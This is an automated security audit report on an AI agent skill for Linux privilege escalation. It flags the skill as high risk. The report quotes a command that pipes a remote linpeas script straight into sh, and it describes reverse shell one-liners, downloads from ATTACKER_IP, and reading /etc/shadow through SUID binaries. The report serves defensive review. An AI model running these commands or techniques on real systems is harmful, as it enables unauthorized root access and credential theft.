linux-privilege-escalation
Fail
Audited by Gen Agent Trust Hub on Feb 28, 2026
Risk Level: HIGH
Findings: REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, DATA_EXFILTRATION, CREDENTIALS_UNSAFE
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill downloads and immediately executes a shell script from a third-party GitHub repository using a piped command, which bypasses security reviews of the script content.
  - Evidence: `curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh` in Phase 2.
- [COMMAND_EXECUTION]: The skill provides a comprehensive suite of commands for gaining root access, including compiling kernel exploits and manipulating system-level permissions.
  - Evidence: Extensive use of `sudo`, `gcc`, `chmod +s`, and `LD_PRELOAD` to bypass security controls.
- [EXTERNAL_DOWNLOADS]: The skill encourages downloading scripts and source code from arbitrary remote servers, which could serve as a vector for malware.
  - Evidence: Instructions for downloading files from `ATTACKER_IP` using `wget`.
- [DATA_EXFILTRATION]: The skill includes multiple reverse shell one-liners designed to establish unauthorized outbound network connections.
  - Evidence: Payloads for Bash, Python, and Netcat that connect to an external IP and port.
- [CREDENTIALS_UNSAFE]: The skill demonstrates how to read and extract password hashes from sensitive system files like `/etc/shadow`.
  - Evidence: Use of SUID-enabled `base64` to read shadow files for offline password cracking.
Recommendations
- HIGH: Downloads and executes remote code from: https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh - DO NOT USE without thorough review
- AI detected serious security threats
Audit Metadata